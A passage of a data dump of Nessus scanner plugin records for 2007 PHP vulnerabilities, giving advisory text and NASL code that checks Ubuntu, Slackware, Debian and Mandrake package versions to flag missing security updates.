(ubuntu_check(osver:\"6.06\", pkgname:\"php5-cli\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-common\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-curl\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-dev\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-gd\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-ldap\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mhash\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysql\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysqli\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-odbc\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-pgsql\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-recode\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-snmp\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sqlite\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sybase\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xmlrpc\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xsl\", pkgver:\"5.1.2-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php-pear\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-cgi\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-cli\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-common\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-curl\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-dev\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-gd\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-ldap\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-mhash\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-mysql\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-mysqli\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-odbc\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-pgsql\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-recode\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-snmp\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-sqlite\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-sybase\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"php5-xsl\", pkgver:\"5.1.6-1ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / php-pear / php5 / php5-cgi / php5-cli / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:46", "bulletinFamily": "scanner", "description": "New php packages are available for Slackware 10.2 and 11.0 to improve the stability and security of PHP. Quite a few bugs were fixed -- please see http://www.php.net for a detailed list. All sites that use PHP are encouraged to upgrade. Please note that we haven't tested all PHP applications for backwards compatibility with this new upgrade, so you should have the old package on hand just in case. Both PHP 4.4.5 and PHP 5.2.1 updates have been provided. Some of these issues have been assigned CVE numbers and may be referenced in the Common Vulnerabilities and Exposures (CVE) database:\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0907 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0908 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0909 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0988", "modified": "2018-08-09T00:00:00", "id": "SLACKWARE_SSA_2007-053-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24691", "published": "2007-02-23T00:00:00", "title": "Slackware 10.2 / 11.0 : php (SSA:2007-053-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2007-053-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24691);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/09 17:06:37\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_xref(name:\"SSA\", value:\"2007-053-01\");\n\n script_name(english:\"Slackware 10.2 / 11.0 : php (SSA:2007-053-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 10.2 and 11.0 to improve\nthe stability and security of PHP. Quite a few bugs were fixed --\nplease see http://www.php.net for a detailed list. All sites that use\nPHP are encouraged to upgrade. Please note that we haven't tested all\nPHP applications for backwards compatibility with this new upgrade, so\nyou should have the old package on hand just in case. Both PHP 4.4.5\nand PHP 5.2.1 updates have been provided. Some of these issues have\nbeen assigned CVE numbers and may be referenced in the Common\nVulnerabilities and Exposures (CVE) database:\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0907\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0908\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0909\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6ec7ea49\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/23\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"10.2\", pkgname:\"php\", pkgver:\"4.4.5\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"php\", pkgver:\"4.4.5\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:48", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in PHP, a server-side, HTML-embedded scripting language, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2007-0906 It was discovered that an integer overflow in the str_replace() function could lead to the execution of arbitrary code.\n\n - CVE-2007-0907 It was discovered that a buffer underflow in the sapi_header_op() function could crash the PHP interpreter.\n\n - CVE-2007-0908 Stefan Esser discovered that a programming error in the wddx extension allows information disclosure.\n\n - CVE-2007-0909 It was discovered that a format string vulnerability in the odbc_result_all() functions allows the execution of arbitrary code.\n\n - CVE-2007-0910 It was discovered that super-global variables could be overwritten with session data.\n\n - CVE-2007-0988 Stefan Esser discovered that the zend_hash_init() function could be tricked into an endless loop, allowing denial of service through resource consumption until a timeout is triggered.", "modified": "2018-08-09T00:00:00", "id": "DEBIAN_DSA-1264.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24793", "published": "2007-03-12T00:00:00", "title": "Debian DSA-1264-1 : php4 - several vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1264. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24793);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_xref(name:\"DSA\", value:\"1264\");\n\n script_name(english:\"Debian DSA-1264-1 : php4 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2007-0906\n It was discovered that an integer overflow in the\n str_replace() function could lead to the execution of\n arbitrary code.\n\n - CVE-2007-0907\n It was discovered that a buffer underflow in the\n sapi_header_op() function could crash the PHP\n interpreter.\n\n - CVE-2007-0908\n Stefan Esser discovered that a programming error in the\n wddx extension allows information disclosure.\n\n - CVE-2007-0909\n It was discovered that a format string vulnerability in\n the odbc_result_all() functions allows the execution of\n arbitrary code.\n\n - CVE-2007-0910\n It was discovered that super-global variables could be\n overwritten with session data.\n\n - CVE-2007-0988\n Stefan Esser discovered that the zend_hash_init()\n function could be tricked into an endless loop, allowing\n denial of service through resource consumption until a\n timeout is triggered.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-0988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2007/dsa-1264\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php4 packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 4:4.3.10-19.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/03/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libapache-mod-php4\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapache2-mod-php4\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-cgi\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-cli\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-common\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-curl\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-dev\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-domxml\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-gd\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-imap\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-ldap\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mcal\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mhash\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mysql\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-odbc\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-pear\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-recode\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-snmp\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-sybase\", reference:\"4:4.3.10-19\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-xslt\", reference:\"4:4.3.10-19\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:46", "bulletinFamily": "scanner", "description": "A number of vulnerabilities were discovered in PHP language.\n\nMany buffer overflow flaws were discovered in the PHP session extension, the str_replace() function, and the imap_mail_compose() function. An attacker able to use a PHP application using any of these functions could trigger these flaws and possibly execute arbitrary code as the apache user (CVE-2007-0906).\n\nA one-byte memory read will always occur prior to the beginning of a buffer, which could be triggered, for example, by any use of the header() function in a script (CVE-2007-0907).\n\nThe wddx extension, if used to import WDDX data from an untrusted source, may allow a random portion of heap memory to be exposed due to certain WDDX input packets (CVE-2007-0908).\n\nThe odbc_result_all() function, if used to display data from a database, and if the contents of the database are under the control of an attacker, could lead to the execution of arbitrary code due to a format string vulnerability (CVE-2007-0909).\n\nSeveral flaws in the PHP could allow attackers to clobber certain super-global variables via unspecified vectors (CVE-2007-0910).\n\nThe zend_hash_init() function can be forced into an infinite loop if unserializing untrusted data on a 64-bit platform, resulting in the consumption of CPU resources until the script timeout alarm aborts the execution of the script (CVE-2007-0988).\n\nUpdated package have been patched to correct this issue.", "modified": "2018-07-19T00:00:00", "id": "MANDRAKE_MDKSA-2007-048.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24695", "published": "2007-02-23T00:00:00", "title": "Mandrake Linux Security Advisory : php (MDKSA-2007:048)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:048. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24695);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/07/19 20:59:14\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1380\");\n script_xref(name:\"MDKSA\", value:\"2007:048\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2007:048)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities were discovered in PHP language.\n\nMany buffer overflow flaws were discovered in the PHP session\nextension, the str_replace() function, and the imap_mail_compose()\nfunction. An attacker able to use a PHP application using any of these\nfunctions could trigger these flaws and possibly execute arbitrary\ncode as the apache user (CVE-2007-0906).\n\nA one-byte memory read will always occur prior to the beginning of a\nbuffer, which could be triggered, for example, by any use of the\nheader() function in a script (CVE-2007-0907).\n\nThe wddx extension, if used to import WDDX data from an untrusted\nsource, may allow a random portion of heap memory to be exposed due to\ncertain WDDX input packets (CVE-2007-0908).\n\nThe odbc_result_all() function, if used to display data from a\ndatabase, and if the contents of the database are under the control of\nan attacker, could lead to the execution of arbitrary code due to a\nformat string vulnerability (CVE-2007-0909).\n\nSeveral flaws in the PHP could allow attackers to clobber certain\nsuper-global variables via unspecified vectors (CVE-2007-0910).\n\nThe zend_hash_init() function can be forced into an infinite loop if\nunserializing untrusted data on a 64-bit platform, resulting in the\nconsumption of CPU resources until the script timeout alarm aborts the\nexecution of the script (CVE-2007-0988).\n\nUpdated package have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.0.4-9.19.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libphp5_common5-5.0.4-9.19.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-cgi-5.0.4-9.19.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-cli-5.0.4-9.19.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-devel-5.0.4-9.19.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-fcgi-5.0.4-9.19.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-imap-5.0.4-2.5.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-odbc-5.0.4-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-session-5.0.4-1.1.20060mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.1.6-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libphp5_common5-5.1.6-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-cgi-5.1.6-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-cli-5.1.6-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-devel-5.1.6-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-fcgi-5.1.6-1.6mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-imap-5.1.6-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-odbc-5.1.6-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-session-5.1.6-1.1mdv2007.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:43", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities have been found in PHP, including : buffer overflows, stack overflows, format string, and information disclosure vulnerabilities.\n\nThe session extension contained safe_mode and open_basedir bypasses, but the FreeBSD Security Officer does not consider these real security vulnerabilities, since safe_mode and open_basedir are insecure by design and should not be relied upon.", "modified": "2018-11-10T00:00:00", "id": "FREEBSD_PKG_7FCF1727BE7111DBB2EC000C6EC775D9.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24365", "published": "2007-02-18T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (7fcf1727-be71-11db-b2ec-000c6ec775d9)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 